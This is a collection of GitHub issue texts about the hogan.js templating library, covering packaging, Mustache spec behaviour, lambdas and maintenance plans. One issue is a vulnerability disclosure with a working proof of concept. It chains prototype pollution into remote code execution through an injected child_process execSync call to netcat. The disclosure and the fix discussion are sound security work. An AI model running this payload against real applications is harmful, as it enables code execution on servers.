Any plans to publish the latest version to npm? I'm running into issues with hulk (/ and - in filenames) with the current published version and it looks like those issues have been fixed in master.

Hogan.js can be chained with prototype pollution to gain Remote Code Execution as Hogan.js objects can be easily controlled.

Description:

• This vulnerability is regarding https://github.com/twitter/hogan.js

• The function createPartials is called whenever '<' exists in tokens .In function createPartials code generated are getting concatenated and then evaluated later.

• When Prototype pollution bug exist in a application it could pollute certain variables in complier.js and hence the code generated can be controlled.In this case node.indent and context.prefix can be polluted and can be used to gain rce.

POC

var hogan = require("hogan.js");

// construct template string
var template = "my {{>example}} template.";

//Prototype Pollution
constructor.prototype.indent="console.log(\"));console.log(process.mainModule.require('child_process').execSync('nc 127.0.0.1 1337'))//\")";
constructor.prototype.prefix="abcd";

var tokens=hogan.scan(template)
console.log("tokens",tokens)

// compile template
var compiled = hogan.compile(template);

console.log("compiled" , compiled)
var s = compiled.render({example: 'twitterer' })
console.log("renderd",s)

To Reproduce Steps to reproduce the behavior:

1. Run above poc.js
2. listen on port 1337

Screenshots

Additional context

For more information refer here https://sayoojbkumar.me/blog/2021/12/15/PP-Hogan-js/

as per the Mustache spec (and as implemented in Mustache.js), an empty string should be counted as falsey when boolean coercion is in place for rendering sections.

given the following template {{#test}}blah{{/test}} and context {test: ""} the result from rendering it should be an empty string. Hogan actually outputs "blah"

We have a lib/ directory, so we should have a bin/ directory to go along with it.

It would be handy to have hogan generate compiled functions on the command line. I see @bradleywright already has something going there.

Hi guys

from the previous issues and commit messages it looks like Hogan can now do inheritance.

Can you write an example / doc / test to show the syntax, please?

Ta!

Hey guys,

I noticed lambda functions are not supported in precompiled templates. The core reason for this appears to be that the official Mustache specification reads:

Lambdas are a special-cased data type for use in interpolations and sections.

(...)

When used as the data value for a Section tag, the lambda MUST be treatable as an arity 1 function, and invoked as such (passing a String containing the unprocessed section contents). The returned value MUST be rendered against the current delimiters, then interpolated in place of the section.

Unfortunately, this behavior requires that when a lambda function is used, the original (unprocessed) source of the template is available. In order to remedy this situation, I created a fork that works on the processed section contents instead (I've not created a pull request as it deliberately diverts from the spec to create the desired result).

Anyway, I think it's good to make you aware of this fork, and I'm looking for any feedback you guys can give me. Also, if you prefer I create a pull request for this, I can do that too.

One more question, I tried running the test suite through run.js to see if my changes had any unintended side-effects, but run.js gave me no output whatsoever. Probably I'm just unaware how to properly run the suite, but I didn't see instructions either, so if someone can point me to how to properly run the test suite that would be great.

You can find my fork right here: https://github.com/arendjr/hogan.js

Regards, Arend jr.

Compiling templates on the server (via Java SCriptEngine for example) returns an object. How can that object be transferred to the client? JSON.stringfy?

Wouldn't it benefital just to transfer the generated code to the client? This can't be done atm

Minified version should be provided for client side use preferably with a version number in the file name (I don't see the current version of hogan.js anywhere?).

I recently commented on #75 but realised it was closed while this one deserves a current issue of its own.

I just tested with the last v1 release (1.0.5) that I'm able to define a function like

var foo = function () {
  return function(text, render) {
    return bar(render(text));
  }
}

which I can then use with a template like {{#foo}}{{baz}}{{/foo}}. This works delightfully and solves all my templating problems.

I'm unable to get this behaviour working v2 onwards: I see the ugly Uncaught ReferenceError: render is not defined for the exact same code. Did something break along the way for it to be thus or am I missing something?

Hi apologies if this is a subject spoken about elsewhere but I can't seem to find a current issue, consider the following unit test, which is a slight adaptation of an existing one, the only difference is that the lambda function is moved from text to partial. Should this test pass or is it a misuse by myself?

var lambda = function() {
  return function(argument) {
    return 'changed ' + argument;
  }
}

var parent = '{{$section}}{{/section}}';
var partial = '{{#lambda}}{{$label}}test1{{/label}}{{/lambda}}';
var text = '{{< parent}}{{$section}}{{<partial}}{{$label}}test2{{/label}}{{/partial}}{{/section}}{{/parent}}';
var template = Hogan.compile(text);
var result = template.render({lambda: lambda}, {partial: Hogan.compile(partial), parent: Hogan.compile(parent)});

is(result, 'changed test2', 'Lambda expression in included partial templates');`

Sometime between node-0.6.8 and node-0.6.11, the way NPM untars package files seems to have changed, and I believe this has revealed a latent problem with Hogan's package tar.gz file as published to the NPM registry.

In particular, none of the directories in the archive seem to have the execute permission flag set, which means that, once unpacked, it is impossible to actually read their contents (without altering the permission flags). This didn't bug the old NPM, but the current one will complain when attempting to install Hogan, along these lines:

npm ERR! path /tmp/npm-1330464275415/1330464275783-0.16246374556794763/___package.npm/package/bin/hulk
npm ERR! code EACCES
npm ERR! message EACCES, permission denied '/tmp/npm-1330464275415/1330464275783-0.16246374556794763/___package.npm/package/bin/hulk'

If you download, untar, and inspect the package file, you can see what's up:

$ curl -k -o hogan.tar.gz https://registry.npmjs.org/hogan/-/hogan-1.0.5-dev.tgz
[...]
$ tar xzf hogan.tar.gz 
$ ls -alF package/
total 64
drwxrwxr-x 8 ec2-user ec2-user  4096 Feb 28 21:32 ./
drwxr-xr-x 9 ec2-user ec2-user  4096 Feb 28 21:32 ../
drw-rw-r-- 2 ec2-user ec2-user  4096 Jan 28 21:44 bin/
-rw-rw-r-- 1 ec2-user ec2-user    14 Jan 28 21:44 .git_ignore
-rw-rw-r-- 1 ec2-user ec2-user    89 Jan 28 21:44 .gitmodules
drw-rw-r-- 2 ec2-user ec2-user  4096 Jan 28 21:44 lib/
-rw-rw-r-- 1 ec2-user ec2-user 10349 Jan 28 21:44 LICENSE
-rw-rw-r-- 1 ec2-user ec2-user  1324 Jan 28 21:44 Makefile
-rw-rw-r-- 1 ec2-user ec2-user   558 Jan 28 21:44 package.json
-rw-rw-r-- 1 ec2-user ec2-user  2607 Jan 28 21:44 README.md
drw-rw-r-- 4 ec2-user ec2-user  4096 Jan 28 21:44 test/
drw-rw-r-- 2 ec2-user ec2-user  4096 Jan 28 21:44 tools/
drw-rw-r-- 6 ec2-user ec2-user  4096 Jan 28 21:44 web/
drw-rw-r-- 2 ec2-user ec2-user  4096 Jan 28 21:44 wrappers/
$

I'd expect all the directories to show up as drwxrwxr-x, which is what you'll see in pretty much every other NPM package (or tarball in general for that matter).

This makes it more difficult for RCEs in other libraries to overwrite the prototype chain to manipulate Hogan, but also prevents authors from manipulating the prototype chain on purpose. I think the latter is rare enough that this change is worth it.

This first patch just fixes node.indent. See #274.

I was alerted to https://github.com/mustache/spec/pull/125, which covers most of the non-standard features shared by Mustache.java and hogan.js. It's been ~8 years since I seriously worked on this project, but this seems like a good time to close things up.

After this work is done, I'll add a note to the README that makes it clear the project is not adding new features, and is in maintenance mode. Serious bugs, such as security issues, will be addressed. New features and performance work can be done in a fork.

deprecated [email protected]: Legacy versions of mkdirp are no longer supported. Please update to mkdirp 1.x. (Note that the API surface has changed to use Promises in 1.x.)

There is a small typo in web/1.0.0/hogan.js, web/builds/1.0.0/hogan.js, web/builds/1.0.3/hogan.js, web/builds/1.0.4/hogan-1.0.4.amd.js, web/builds/1.0.4/hogan-1.0.4.common.js, web/builds/1.0.4/hogan-1.0.4.js, web/builds/1.0.4/hogan-1.0.4.mustache.js, web/builds/1.0.4/template-1.0.4.js, web/builds/1.0.5/hogan-1.0.5.amd.js, web/builds/1.0.5/hogan-1.0.5.common.js, web/builds/1.0.5/hogan-1.0.5.js, web/builds/1.0.5/hogan-1.0.5.mustache.js, web/builds/1.0.5/template-1.0.5.js, web/builds/2.0.0/hogan-2.0.0.amd.js, web/builds/2.0.0/hogan-2.0.0.common.js, web/builds/2.0.0/hogan-2.0.0.js, web/builds/2.0.0/hogan-2.0.0.mustache.js, web/builds/2.0.0/template-2.0.0.js.

Should read current rather than curent.